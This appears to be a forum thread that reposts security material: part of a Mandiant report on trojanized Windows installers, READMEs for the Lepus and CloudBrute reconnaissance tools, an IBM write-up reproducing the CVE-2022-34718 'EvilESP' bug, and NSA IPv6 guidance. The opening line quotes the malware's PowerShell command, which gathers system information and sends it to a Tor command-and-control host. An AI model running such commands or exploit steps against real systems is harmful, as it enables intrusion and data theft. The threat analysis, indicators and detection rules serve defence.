chcp 65001; [console]::outputencoding = [system.text.encoding]::UTF8; Start-Process powershell -argument "Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8" -wait -nonewwindow; curl.exe -H ('h:'+(wmic csproduct get UUID)) --data-binary "@sysinfo" -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe; rm sysinfo

Trojanized Windows Image

Network Indicators
Indicators of Compromise | Signature
56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid[.]onion[.]moe | Malicious Windows Image Tor C2
ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion[.]moe | Malicious Windows Image Tor C2
ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion[.]ws | Malicious Windows Image Tor C2

BEACON C2s
https://cdnworld[.]org/34192–general-feedback/suggestions/35703616-cdn–
https://cdnworld[.]org/34702–general/sync/42823419-cdn

STOWAWAY C2s
193.142.30[.]166:443
91.205.230[.]66:8443

Appendix

MITRE ATT&CK Framework
Initial Access: T1195.002: Compromise Software Supply Chain
Persistence: T1136: Create Account; T1543.003: Windows Service
Discovery: T1049: System Network Connections Discovery
Execution: T1047: Windows Management Instrumentation; T1059: Command and Scripting Interpreter; T1059.001: PowerShell; T1059.005: Visual Basic; T1569.002: Service Execution
Defense Evasion: T1027: Obfuscated Files or Information; T1055: Process Injection; T1140: Deobfuscate/Decode Files or Information; T1218.011: Rundll32; T1562.004: Disable or Modify System Firewall; T1574.011: Services Registry Permissions Weakness
Command and Control: T1071.004: DNS; T1090.003: Multi-hop Proxy; T1095:
Non-Application Layer Protocol; T1573.002: Asymmetric Cryptography
Resource Development: T1587.002: Code Signing Certificates; T1588.004: Digital Certificates; T1608.003: Install Digital Certificate

Detection Rules

rule M_Backdoor_SPAREPART_SleepGenerator
{
    meta:
        author = "Mandiant"
        date_created = "2022-12-14"
        description = "Detects the algorithm used to determine the next sleep timer"
        version = "1"
        weight = "100"
        hash = "f9cd5b145e372553dded92628db038d8"
        disclaimer = "This rule is meant for hunting and is not tested to run in a production environment."
    strings:
        $ = {C1 E8 06 89 [5] C1 E8 02 8B}
        $ = {c1 e9 03 33 c1 [3] c1 e9 05 33 c1 83 e0 01}
        $ = {8B 80 FC 00 00 00}
        $ = {D1 E8 [4] c1 E1 0f 0b c1}
    condition:
        all of them
}

rule M_Backdoor_SPAREPART_Struct
{
    meta:
        author = "Mandiant"
        date_created = "2022-12-14"
        description = "Detects the PDB and a struct used in SPAREPART"
        hash = "f9cd5b145e372553dded92628db038d8"
        disclaimer = "This rule is meant for hunting and is not tested to run in a production environment."
    strings:
        $pdb = "c:\\Users\\user\\Desktop\\ImageAgent\\ImageAgent\\PreAgent\\src\\builder\\agent.pdb" ascii nocase
        $struct = { 44 89 ac ?? ?? ?? ?? ?? 4? 8b ac ?? ?? ?? ?? ?? 4? 83 c5 28 89 84 ?? ?? ?? ?? ?? 89 8c ?? ?? ?? ?? ?? 89 54 ?? ?? 44 89 44 ?? ?? 44 89 4c ?? ?? 44 89 54 ?? ?? 44 89 5c ?? ?? 89 5c ?? ?? 89 7c ?? ?? 89 74 ?? ?? 89 6c ?? ?? 44 89 74 ?? ?? 44 89 7c ?? ?? 44 89 64 ?? ?? 8b 84 ?? ?? ?? ?? ?? 44 8b c8 8b 84 ?? ?? ?? ?? ?? 44 8b c0 4? 8d 15 ?? ?? ?? ?? 4? 8b cd ff 15 ?? ?? ?? ?? }
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pdb and $struct and filesize < 20KB
}

Sursa: https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government
-
-
Lepus

Lepus is a tool for enumerating subdomains, checking for subdomain takeovers and performing port scans - and boy, is it fast!

Basic Usage
lepus.py yahoo.com

Summary
Enumeration modes
Subdomain Takeover
Port Scan
Installation
Arguments
Full command example

Enumeration modes
The enumeration modes are the different ways lepus identifies subdomains for a given domain. These modes are: Collectors, Dictionary, Permutations, Reverse DNS, Markov.

Moreover: For all methods, lepus checks whether the given domain or any generated potential subdomain is a wildcard domain. After identification, lepus collects ASN and network information for the identified domains that resolve to public IP addresses.

Collectors
The Collectors mode collects subdomains from the following services (Service / API Required):
AlienVault OTX / No
Anubis-DB / No
Bevigil / Yes
BinaryEdge / Yes
BufferOver / Yes
C99 / Yes
Censys / Yes
CertSpotter / No
CommonCrawl / No
CRT / No
DNSDumpster / No
DNSRepo / Yes
DNSTrails / Yes
Farsight DNSDB / Yes
FOFA / Yes
Fullhunt / Yes
HackerTarget / No
HunterIO / Yes
IntelX / Yes
LeakIX / Yes
Maltiverse / No
Netlas / Yes
PassiveTotal / Yes
Project Discovery Chaos / Yes
RapidDNS / No
ReconCloud / No
Riddler / Yes
Robtex / Yes
SecurityTrails / Yes
Shodan / Yes
SiteDossier / No
ThreatBook / Yes
ThreatCrowd / No
ThreatMiner / No
URLScan / Yes
VirusTotal / Yes
Wayback Machine / No
Webscout / No
WhoisXMLAPI / Yes
ZoomEye / Yes

You can add your API keys in the config.ini file. The Collectors module runs by default. If you do not want to use the collectors during a lepus run (so that you don't exhaust your API key limits), you can use the -nc or --no-collectors argument.

Dictionary
The dictionary mode can be used when you want to provide lepus a list of subdomains. You can use the -w or --wordlist argument followed by the file. A custom list comes with lepus, located at lists/subdomains.txt.
An example run would be:
lepus.py -w lists/subdomains.txt yahoo.com

Permutations
The Permutations mode performs changes on the list of subdomains that have been identified. For each subdomain, a number of permutations will take place based on the lists/words.txt file. You can also provide a custom wordlist for permutations with the -pw or --permutation-wordlist argument, followed by the file name. An example run would be:
lepus.py --permutate yahoo.com
or
lepus.py --permutate -pw customsubdomains.txt yahoo.com

ReverseDNS
The ReverseDNS mode will gather all IP addresses that were resolved and perform a reverse DNS lookup on each one in order to detect more subdomains. For example, if www.example.com resolves to 1.2.3.4, lepus will perform a reverse DNS lookup for 1.2.3.4 and gather any other subdomains belonging to example.com, e.g. www2, internal or oldsite. To run the ReverseDNS module, use the --reverse argument. Additionally, --ripe (or -ripe) can be used to instruct the module to query the RIPE database using the second-level domain for potential network ranges. Moreover, lepus supports the --ranges (or -r) argument. You can use it to make reverse DNS resolutions against CIDRs that belong to the target domain. By default this module will take into account all previously identified IPs, then defined ranges, then ranges identified through the RIPE database. In case you only want to run the module against specific or RIPE-identified ranges, and not against all already identified IPs, you can use the --only-ranges (-or) argument. An example run would be:
lepus.py --reverse yahoo.com
or
lepus.py --reverse -ripe -r 172.216.0.0/16,183.177.80.0/23 yahoo.com
or, only against the defined or RIPE-identified ranges:
lepus.py --reverse -or -ripe -r 172.216.0.0/16,183.177.80.0/23 yahoo.com

Hint: lepus will identify ASNs and networks during enumeration, so you can also use these ranges to identify more subdomains with a subsequent run.
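The ReverseDNS idea described above can be sketched in a few lines of Python. Function and variable names here are illustrative, not taken from Lepus itself:

```python
# Minimal sketch of the ReverseDNS mode: resolve a PTR record for each
# known IP and keep any name that falls under the target domain.
import socket


def reverse_lookup(ip):
    """Return the PTR name for an IP, or None if no record exists."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None


def discover_from_ips(ips, domain):
    """Collect subdomains of `domain` found via reverse DNS on `ips`."""
    found = set()
    for ip in ips:
        name = reverse_lookup(ip)
        if name and name.rstrip(".").endswith("." + domain):
            found.add(name.rstrip("."))
    return found
```

In practice a tool like this would run lookups concurrently and also feed the results back into the permutation and Markov modes.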
Markov
With this module, Lepus will utilize Markov chains to train itself on the already known subdomains and then generate new candidates based on them. The bigger the general surface, the better the tool will be able to train itself and, subsequently, the better the results will be. The module can be activated with the --markovify argument. Parameters also include the Markov state size, the maximum length of the generated candidate additions, and the quantity of generated candidates. Predefined values are 3, 5 and 5 respectively. Those arguments can be changed with -ms (--markov-state), -ml (--markov-length) and -mq (--markov-quantity) to meet your needs. Keep in mind that the larger these values are, the more time Lepus will need to generate the candidates. It has to be noted that different executions of this module might generate different candidates, so feel free to run it a few times consecutively.
lepus.py --markovify yahoo.com
or
lepus.py --markovify -ms 5 -ml 10 -mq 10

Subdomain Takeover
Lepus has a list of signatures to identify if a domain can be taken over. You can use it by providing the --takeover argument. This module also supports Slack notifications, once a potential takeover has been identified, by adding a Slack token in the config.ini file. The checks are made against the following services:
Acquia
Activecampaign
Aftership
Aha!
Airee
Amazon AWS/S3
Apigee
Azure
Bigcartel
Bitbucket
Brightcove
Campaign Monitor
Cargo Collective
Desk
Feedpress
Fly.io
Getresponse
Ghost.io
Github
Hatena
Helpjuice
Helpscout
Heroku
Instapage
Intercom
JetBrains
Kajabi
Kayako
Launchrock
Mashery
Maxcdn
Moosend
Ning
Pantheon
Pingdom
Readme.io
Simplebooklet
Smugmug
Statuspage
Strikingly
Surge.sh
Surveygizmo
Tave
Teamwork
Thinkific
Tictail
Tilda
Tumblr
Uptime Robot
UserVoice
Vend
Webflow
Wishpond
Wordpress
Zendesk

Port Scan
The port scan module will check open ports against a target and log them in the results. You can use the --portscan argument, which by default will scan ports 80, 443, 8000, 8080, 8443. You can also use custom ports or choose a predefined set of ports (Ports set / Ports):
small: 80, 443
medium (default): 80, 443, 8000, 8080, 8443
large: 80, 81, 443, 591, 2082, 2087, 2095, 2096, 3000, 8000, 8001, 8008, 8080, 8083, 8443, 8834, 8888, 9000, 9090, 9443
huge: 80, 81, 300, 443, 591, 593, 832, 981, 1010, 1311, 2082, 2087, 2095, 2096, 2480, 3000, 3128, 3333, 4243, 4567, 4711, 4712, 4993, 5000, 5104, 5108, 5800, 6543, 7000, 7396, 7474, 8000, 8001, 8008, 8014, 8042, 8069, 8080, 8081, 8088, 8090, 8091, 8118, 8123, 8172, 8222, 8243, 8280, 8281, 8333, 8443, 8500, 8834, 8880, 8888, 8983, 9000, 9043, 9060, 9080, 9090, 9091, 9200, 9443, 9800, 9943, 9980, 9981, 12443, 16080, 18091, 18092, 20720, 28017

An example run would be:
lepus.py --portscan yahoo.com
or
lepus.py --portscan -p huge yahoo.com
or
lepus.py --portscan -p 80,443,8082,65123 yahoo.com

Installation
Normal installation:
$ python3.7 -m pip install -r requirements.txt
Preferably install in a virtualenv:
$ pyenv virtualenv 3.7.4 lepus
$ pyenv activate lepus
$ pip install -r requirements.txt
Installing latest python on debian:
$ apt install build-essential zlib1g-dev libncurses5-dev libgdbm-dev libnss3-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev wget
$ curl -O https://www.python.org/ftp/python/3.7.4/Python-3.7.4.tar.xz
$ tar -xf Python-3.7.4.tar.xz
$ cd
Python-3.7.4
$ ./configure --enable-optimizations --enable-loadable-sqlite-extensions
$ make
$ make altinstall

Arguments
usage: lepus.py [-h] [-w WORDLIST] [-hw] [-t THREADS] [-nc] [-zt] [--permutate] [-pw PERMUTATION_WORDLIST] [--reverse] [-r RANGES] [--portscan] [-p PORTS] [--takeover] [--markovify] [-ms MARKOV_STATE] [-ml MARKOV_LENGTH] [-mq MARKOV_QUANTITY] [-f] [-v] domain

Infrastructure OSINT

positional arguments:
  domain                domain to search

optional arguments:
  -h, --help            show this help message and exit
  -w WORDLIST, --wordlist WORDLIST
                        wordlist with subdomains
  -hw, --hide-wildcards
                        hide wildcard resolutions
  -t THREADS, --threads THREADS
                        number of threads [default is 100]
  -nc, --no-collectors  skip passive subdomain enumeration
  -zt, --zone-transfer  attempt to zone transfer from identified name servers
  --permutate           perform permutations on resolved domains
  -pw PERMUTATION_WORDLIST, --permutation-wordlist PERMUTATION_WORDLIST
                        wordlist to perform permutations with [default is lists/words.txt]
  --reverse             perform reverse dns lookups on resolved public IP addresses
  -ripe, --ripe         query ripe database with the 2nd level domain for networks to be used for reverse lookups
  -r RANGES, --ranges RANGES
                        comma seperated ip ranges to perform reverse dns lookups on
  -or, --only-ranges    use only ranges provided with -r or -ripe and not all previously identifed IPs
  --portscan            scan resolved public IP addresses for open ports
  -p PORTS, --ports PORTS
                        set of ports to be used by the portscan module [default is medium]
  --takeover            check identified hosts for potential subdomain take-overs
  --markovify           use markov chains to identify more subdomains
  -ms MARKOV_STATE, --markov-state MARKOV_STATE
                        markov state size [default is 3]
  -ml MARKOV_LENGTH, --markov-length MARKOV_LENGTH
                        max length of markov substitutions [default is 5]
  -mq MARKOV_QUANTITY, --markov-quantity MARKOV_QUANTITY
                        max quantity of markov results per candidate length [default is 5]
  -f, --flush           purge all records of the specified domain from
the database
  -v, --version         show program's version number and exit

Full command example
The following is an example run with all available active arguments:
./lepus.py python.org --wordlist lists/subdomains.txt --permutate -pw ~/mypermsword.lst --reverse -ripe -r 10.11.12.0/24 --portscan -p huge --takeover --markovify -ms 3 -ml 10 -mq 10
The following command flushes all database entries for a specific domain:
./lepus.py python.org --flush

Sursa: https://github.com/GKNSB/Lepus
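The Markov mode described earlier can be sketched roughly as follows. This is a toy illustration of the character-level chain technique, not Lepus's actual implementation:

```python
# Toy character-level Markov chain for subdomain candidate generation:
# learn transitions from known labels, then emit new candidates.
import random
from collections import defaultdict


def train(labels, state=3):
    """Build a transition table from known subdomain labels."""
    chains = defaultdict(list)
    for label in labels:
        padded = "^" * state + label + "$"   # ^ = start pad, $ = end marker
        for i in range(len(padded) - state):
            chains[padded[i:i + state]].append(padded[i + state])
    return chains


def generate(chains, state=3, max_len=10, rng=random):
    """Walk the chain from the start state until the end marker or max_len."""
    out, key = "", "^" * state
    while len(out) < max_len:
        nxt = rng.choice(chains.get(key, ["$"]))
        if nxt == "$":
            break
        out += nxt
        key = key[1:] + nxt
    return out
```

Trained on labels like dev1, dev2 and devops, the chain tends to emit dev-prefixed candidates, which is exactly why a larger set of known subdomains yields better guesses.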
-
-
Dissecting and Exploiting TCP/IP RCE Vulnerability “EvilESP”
Software Vulnerabilities January 20, 2023 By Valentina Palmiotti 10 min read

September’s Patch Tuesday unveiled a critical remote vulnerability in tcpip.sys, CVE-2022-34718. The advisory from Microsoft reads: “An unauthenticated attacker could send a specially crafted IPv6 packet to a Windows node where IPsec is enabled, which could enable a remote code execution exploitation on that machine.”

Pure remote vulnerabilities usually attract a lot of interest, but even over a month after the patch, no additional information beyond Microsoft’s advisory had been published publicly. From my side, it had been a long time since I attempted a binary patch diff analysis, so I thought this would be a good bug for root cause analysis and a proof-of-concept (PoC) for a blog post. On October 21 of last year, I posted an exploit demo and root cause analysis of the bug. Shortly thereafter, a blog post and PoC were published by Numen Cyber Labs on the vulnerability, using a different exploitation method than I used in my demo. In this blog, my follow-up article to my exploit video, I include an in-depth explanation of the reverse engineering of the bug and correct some inaccuracies I found in the Numen Cyber Labs blog.

In the following sections, I cover reverse engineering the patch for CVE-2022-34718, the affected protocols, identifying the bug, and reproducing it. I’ll outline setting up a test environment and write an exploit to trigger the bug and cause a Denial of Service (DoS). Finally, I’ll look at exploit primitives and outline the next steps to turn the primitives into remote code execution (RCE).

Patch Diffing
Microsoft’s advisory does not contain any specific details of the vulnerability except that it is contained in the TCP/IP driver and requires IPsec to be enabled.
In order to identify the specific cause of the vulnerability, we’ll compare the patched binary to the pre-patch binary and try to extract the “diff”(erence) using a tool called BinDiff. I used Winbindex to obtain two versions of tcpip.sys: one right before the patch and one right after, both for the same version of Windows. Getting sequential versions of the binaries is important, as using versions even a few updates apart can introduce noise from differences that are not related to the patch and cause you to waste time during your analysis. Winbindex has made patch analysis easier than ever, as you can obtain any Windows binary beginning from Windows 10.

I loaded both of the files in Ghidra, applied the Program Database (pdb) files, and ran auto analysis (enabling the aggressive instruction finder works best). Afterward, the files can be exported into BinExport format using the BinExport extension for Ghidra. The files can then be loaded into BinDiff to create a diff and start analyzing their differences:

BinDiff summary comparing the pre- and post-patch binaries

BinDiff works by matching functions in the binaries being compared using various algorithms. In this case, we have applied function symbol information from Microsoft, so all the functions can be matched by name.

List of matched functions sorted by similarity

Above we see there are only two functions that have a similarity less than 100%. The two functions that were changed by the patch are IppReceiveEsp and Ipv6pReassembleDatagram.

Vulnerability Root Cause Analysis
Previous research shows the Ipv6pReassembleDatagram function handles reassembling IPv6 fragmented packets. The function name IppReceiveEsp seems to indicate this function handles the receiving of IPsec ESP packets. Before diving into the patch, I’ll briefly cover IPv6 fragmentation and IPsec. Having a general understanding of these packet structures will help when attempting to reverse engineer the patch.
IPv6 Fragmentation: An IPv6 packet can be divided into fragments, with each fragment sent as a separate packet. Once all of the fragments reach the destination, the receiver reassembles them to form the original packet. The diagram below illustrates the fragmentation:

Illustration of IPv6 fragmentation

According to the RFC, fragmentation is implemented via an Extension Header called the Fragment header, which has the following format:

IPv6 Fragment Header format

Here, the Next Header field is the type of header present in the fragmented data.

IPsec (ESP): IPsec is a group of protocols that are used together to set up encrypted connections. It’s often used to set up Virtual Private Networks (VPNs). From the first part of the patch analysis, we know the bug is related to the processing of ESP packets, so we’ll focus on the Encapsulating Security Payload (ESP) protocol. As the name suggests, the ESP protocol encrypts (encapsulates) the contents of a packet. There are two modes: tunnel mode, where a copy of the IP header is contained in the encrypted payload, and transport mode, where only the transport layer portion of the packet is encrypted. Like IPv6 fragmentation, ESP is implemented as an extension header. According to the RFC, an ESP packet is formatted as follows:

Top Level Format of an ESP Packet

Here, the Security Parameters Index (SPI) and Sequence Number fields comprise the ESP extension header, and the fields between and including Payload Data and Next Header are encrypted. The Next Header field describes the header contained in Payload Data.

Now, with a primer on IPv6 fragmentation and IPsec ESP, we can continue the patch diff analysis by analyzing the two functions we found were patched.
Ipv6pReassembleDatagram
Comparing the function graphs side by side, we can see that a single new code block has been introduced into the patched function:

Side-by-side comparison of the pre- and post-patch function graphs of Ipv6ReassembleDatagram

Let’s take a closer look at the block:

New code block in the patched function

The new code block compares two unsigned integers (in registers EAX and EDX) and jumps to a block if one value is less than the other. Let’s take a look at that destination block: the target code has an unconditional call to the function IppDeleteFromReassemblySet. Judging from the name of this function, this block seems to be for error handling. We can intuit that the new code is some sort of bounds check, with a “goto error” inserted into the code if the check fails. With this bit of insight, we can perform static analysis in a decompiler.

0vercl0ck previously published a blog post doing vulnerability analysis on a different IPv6 vulnerability and went deep into the reverse engineering of tcpip.sys. From this work and some additional reverse engineering, I was able to fill in structure definitions for the undocumented Packet_t and Reassembly_t objects, as well as identify a couple of crucial local variable assignments.

Decompilation output of Ipv6ReassembleDatagram

In the above code snippet, the pink box surrounds the new code added by the patch. Reassembly->nextheader_offset contains the byte offset of the next_header field in the IPv6 fragmentation header. The bounds check compares next_header_offset to the length of the header buffer. On line 29, HeaderBufferLen is used to allocate a buffer, and on line 35, Reassembly->nextheader_offset is used to index and copy into the allocated buffer. Because this check was added, we now know there was a condition that allows nextheader_offset to exceed the header buffer length.
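The patched logic can be modeled in Python. This is a simplified reconstruction for illustration: field names follow the reverse-engineered structures above, but the sizes and control flow are not the driver's actual code.

```python
# Simplified model of the patched Ipv6pReassembleDatagram allocation and
# copy. Pre-patch, the nextheader_offset index was not validated against
# the buffer length, yielding a 1-byte out-of-bounds write.
IPV6_HEADER_LEN = 40  # fixed IPv6 base header size


def reassemble(ext_headers_len, nextheader_offset, nextheader_value):
    header_buffer_len = IPV6_HEADER_LEN + ext_headers_len
    buf = bytearray(header_buffer_len)
    # The inserted patch: reject reassembly when the offset points past
    # the allocated header buffer (the "goto error" path).
    if nextheader_offset >= header_buffer_len:
        raise ValueError("malformed datagram: next header offset out of bounds")
    buf[nextheader_offset] = nextheader_value  # the write on line 35
    return buf
```

Removing the `if` statement reproduces the pre-patch behavior: an attacker-influenced offset indexes past the end of `buf`.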
We’ll move on to the second patched function to seek more answers.

IppReceiveEsp
Looking at the function graph side by side in the BinDiff workspace, we can identify some new code blocks introduced into the patched function:

Side-by-side comparison of the pre- and post-patch function graphs of IppReceiveEsp

The image below shows the decompilation of the function IppReceiveEsp, with a pink box surrounding the new code added by the patch.

Decompilation output of IppReceiveESP

Here, a new check was added to examine the Next Header field of the ESP packet. The Next Header field identifies the header of the decrypted ESP packet. Recall that a Next Header value can correspond to an upper layer protocol (such as TCP or UDP) or an extension header (such as a fragmentation header or routing header). If the value in NextHeader is 0, 0x2B, or 0x2C, IppDiscardReceivedPackets is called and the error code is set to STATUS_DATA_NOT_ACCEPTED. These values correspond to IPv6 Hop-by-Hop Options, Routing Header for IPv6, and Fragment Header for IPv6, respectively. Referring back to the ESP RFC, it states: “In the IPv6 context, ESP is viewed as an end-to-end payload, and thus should appear after hop-by-hop, routing, and fragmentation extension headers.” Now the problem becomes clear: if a header of these types is contained within an ESP payload, it violates the RFC of the protocol, and the packet will be discarded.

Putting It All Together
Now that we have diagnosed the patches in the two different functions, we can figure out how they are related. In the first function, Ipv6ReassembleDatagram, we determined the fix was for a buffer overflow.

Decompilation output of Ipv6ReassembleDatagram

Recall that the size of the victim buffer is calculated as the size of the extension headers plus the size of an IPv6 header (line 10 above). Now refer back to the patch that was inserted (line 16).
Reassembly->nextheader_offset refers to the offset of the Next Header value in the buffer holding the data for the fragment. Now refer back to the structure of an ESP packet:

Top Level Format of an ESP Packet

Notice that the Next Header field comes *after* Payload Data. This means that Reassembly->nextheader_offset will include the size of the Payload Data, which is controlled by the size of the data and can be much greater than the size of the extension headers. The expected location of the Next Header field is inside an extension header or IPv6 header. In an ESP packet, it is not inside the header, since it is actually contained in the encrypted portion of the packet.

Illustrated root cause of CVE-2022-34718

Now refer back to line 35 of Ipv6ReassembleDatagram; this is where an out-of-bounds 1-byte write occurs (the size and value of NextHeader).

Reproducing the Bug
We now know the bug can be triggered by sending an IPv6 fragmented datagram via IPsec ESP packets. The next question to answer: how will the victim be able to decrypt the ESP packets? To answer this question, I first tried to send packets to a victim containing an ESP header with junk data and put a breakpoint on the vulnerable IppReceiveEsp function to see if the function could be reached. The breakpoint was hit, but the internal function I thought did the decrypting, IppReceiveEspNbl, returned an error, so the vulnerable code was never reached. I further reverse engineered IppReceiveEspNbl and worked my way through to find the point of failure. This is where I learned that in order to successfully decrypt an ESP packet, a security association must be established. A security association consists of a shared state, primarily cryptographic keys and parameters, maintained between two endpoints to secure traffic between them. In simple terms, a security association defines how a host will encrypt/decrypt/authenticate traffic coming from/going to another host.
Security associations can be established via the Internet Key Exchange (IKE) or the Authenticated IP Protocol. In essence, we need a way to establish a security association with the victim so that it knows how to decrypt the incoming data from the attacker. For testing purposes, instead of implementing IKE, I decided to create a security association on the victim manually. This can be done using the Windows Filtering Platform (WFP) WinAPI. Numen’s blog post stated that it’s not possible to use WFP for secret key management. However, that is incorrect, and by modifying sample code provided by Microsoft, it’s possible to set a symmetric key that the victim will use to decrypt ESP packets coming from the attacker IP.

Exploitation
Now that the victim knows how to decrypt ESP traffic from us (the attacker), we can build malformed encrypted ESP packets using scapy. Using scapy, we can send packets at the IP layer. The exploitation process is simple:

CVE-2022-34718 PoC

I create a set of fragmented packets from an ICMPv6 Echo Request. Then each fragment is encrypted into an ESP layer before sending.

Primitive
From the root cause analysis diagram pictured above, we know our primitive gives us an out-of-bounds write at:
offset = sizeof(Payload Data) + sizeof(Padding) + sizeof(Padding Length)
The value of the write is controllable via the value of the Next Header field. I set this value on line 36 in my exploit above (0x41).

Denial of Service (DoS)
Corrupting just one byte at a random offset of the NetIoProtocolHeader2 pool (where the target buffer is allocated) usually does not immediately cause a crash. We can reliably crash the target by inserting additional headers within the fragmented message to parse, or by repeatedly pinging the target after corrupting a large portion of the pool.
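A rough sketch of this flow with scapy follows. This is not the author's exploit: the SPI, key, destination, and fragment size are placeholder assumptions, the ESP parameters must match the security association configured on the victim, and scapy's transport-mode ESP handling may need adjusting to force the fragment header inside the encrypted payload. The small padding helper reflects the ESP trailer alignment rule discussed next.

```python
# Sketch (assumed parameters) of: fragment an ICMPv6 Echo Request, then
# wrap each fragment in an ESP layer before sending.
def esp_pad_len(payload_len, align=4):
    """Padding needed so payload + pad + 2 trailer bytes (Pad Length,
    Next Header) land on the required alignment boundary."""
    return (-(payload_len + 2)) % align


def send_evil_esp(dst, key):
    # scapy imported lazily so the layout helper above stays standalone.
    from scapy.all import send
    from scapy.layers.inet6 import (IPv6, IPv6ExtHdrFragment,
                                    ICMPv6EchoRequest, fragment6)
    from scapy.layers.ipsec import ESP, SecurityAssociation

    # Must mirror the SA manually installed on the victim via WFP.
    sa = SecurityAssociation(ESP, spi=0x1000,
                             crypt_algo="AES-CBC", crypt_key=key)
    pkt = IPv6(dst=dst) / IPv6ExtHdrFragment() / \
        ICMPv6EchoRequest(data=b"A" * 1000)
    for frag in fragment6(pkt, 512):   # split into fragment packets
        send(sa.encrypt(frag))         # each fragment encapsulated in ESP
```

The payload length (here `b"A" * 1000`) is what pushes the Next Header trailer byte, and therefore the out-of-bounds write offset, past the reassembly header buffer.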
Limitations to Overcome
For RCE, the offset is attacker-controlled; however, according to the ESP RFC, padding is required such that the Integrity Check Value (ICV) field (if present) is aligned on a 4-byte boundary. Because sizeof(Padding Length) = sizeof(Next Header) = 1, sizeof(Payload Data) + sizeof(Padding) + 2 must be 4-byte aligned. And therefore:
offset = 4n - 1
where n can be any positive integer, constrained by the fact that the payload data and padding must fit within a single packet and are therefore limited by the MTU (frame size). This is problematic because it means full pointers cannot be overwritten. This is limiting, but not necessarily prohibitive; we can still overwrite the offset of an address in an object, a size, a reference counter, etc. The possibilities available to us depend on what objects can be sprayed in the kernel pool where the victim headerBuff is allocated.

Heap Grooming Research

The affected kernel pool in WinDbg

The victim out-of-bounds buffer is allocated in the NetIoProtocolHeader2 pool. The first steps in heap grooming research are to examine the type of objects allocated in this pool, what is contained in them, how they are used, and how the objects are allocated/freed. This will allow us to examine how the write primitive can be used to obtain a leak or build a stronger primitive. We are not necessarily restricted to NetIoProtocolHeader2. However, because the position of the victim out-of-bounds buffer cannot be predicted, and the address of surrounding pools is randomized, targeting other pools seems challenging.

Demo
Watch the demo exploiting CVE-2022-34718 ‘EvilESP’ for DoS below:

Takeaways
When laid out like this, the bug seems pretty simple. However, it took several long days of reverse engineering and learning about various networking stacks and protocols to understand the full picture and write a DoS exploit.
Many researchers will say that configuring the setup and understanding the environment is the most time-consuming and tedious part of the process, and this was no exception. I am very glad that I decided to do this short project; I understand IPv6, IPsec, and fragmentation much better now.

To learn how IBM Security X-Force can help you with offensive security services, schedule a no-cost consult meeting here: IBM X-Force Scheduler. If you are experiencing cybersecurity issues or an incident, contact X-Force for help: U.S. hotline 1-888-241-9812 | Global hotline (+001) 312-212-8034.

References
https://www.rfc-editor.org/rfc/rfc8200#section-4.5
https://blog.quarkslab.com/analysis-of-a-windows-ipv6-fragmentation-vulnerability-cve-2021-24086.html
https://doar-e.github.io/blog/2021/04/15/reverse-engineering-tcpipsys-mechanics-of-a-packet-of-the-death-cve-2021-24086/#diffing-microsoft-patches-in-2021
https://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml
https://datatracker.ietf.org/doc/html/rfc4303
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34718

Sursa: https://securityintelligence.com/posts/dissecting-exploiting-tcp-ip-rce-vulnerability-evilesp/
-
-
Executive summary Nearly all networked devices use the Internet Protocol (IP) for their communications. IP version 6 (IPv6) is the current version of IP and provides advantages over the legacy IP version 4 (IPv4). Most notably, the IPv4 address space is inadequate to support the increasing number of networked devices requiring routable IP addresses, whereas IPv6 provides a vast address space to meet current and future needs. While some technologies, such as network infrastructure, are more affected by IPv6 than others, nearly all networked hardware and software are affected in some way as well. As a result, IPv6 has broad impact on cybersecurity that organizations should address with due diligence. IPv6 security issues are quite similar to those from IPv4. That is, the security methods used with IPv4 should typically be applied to IPv6 with adaptations as required to address the differences with IPv6. Security issues associated with an IPv6 implementation will generally surface in networks that are new to IPv6, or in early phases of the IPv6 transition. These networks lack maturity in IPv6 configurations and network security tools. More importantly, they lack overall experience by the administrators in the IPv6 protocol. Dual stacked networks (that run both IPv4 and IPv6 simultaneously) have additional security concerns, so further countermeasures are needed to mitigate these risks due to the increased attack surface of having both IPv4 and IPv6. Download: https://media.defense.gov/2023/Jan/18/2003145994/-1/-1/0/CSI_IPV6_SECURITY_GUIDANCE.PDF
CloudBrute

A tool to find a company's (target's) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike. The complete writeup is available here.

At a glance

Motivation

While working on HunterSuite, and as part of the job, we are always thinking of something we can automate to make black-box security testing easier. We discussed the idea of creating a multi-platform cloud brute-force hunter, mainly to find open buckets, apps, and databases hosted on the clouds, and possibly apps behind proxy servers. Here is the list of issues we tried to fix:

- separated wordlists
- lack of proper concurrency
- lack of support for all major cloud providers
- requiring authentication, keys, or cloud CLI access
- outdated endpoints and regions
- incorrect file storage detection
- lack of support for proxies (useful for bypassing region restrictions)
- lack of support for user-agent randomization (useful for bypassing rare restrictions)
- hard to use, poorly configured

Features

- Cloud detection (IPINFO API and source code)
- Supports all major providers
- Black-box (unauthenticated)
- Fast (concurrent)
- Modular and easily customizable
- Cross-platform (Windows, Linux, macOS)
- User-agent randomization
- Proxy randomization (HTTP, SOCKS5)

Supported cloud providers

- Microsoft: Storage, Apps
- Amazon: Storage, Apps
- Google: Storage, Apps
- DigitalOcean: Storage
- Vultr: Storage
- Linode: Storage
- Alibaba: Storage

Version 1.0.0

Usage

Just download the latest release for your operating system and follow the usage. To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder, and there is a config.yaml file in there.
It looks like this:

```yaml
providers: ["amazon","alibaba","amazon","microsoft","digitalocean","linode","vultr","google"] # supported providers
environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
proxytype: "http" # socks5 / http
ipinfo: "" # IPINFO.io API KEY
```

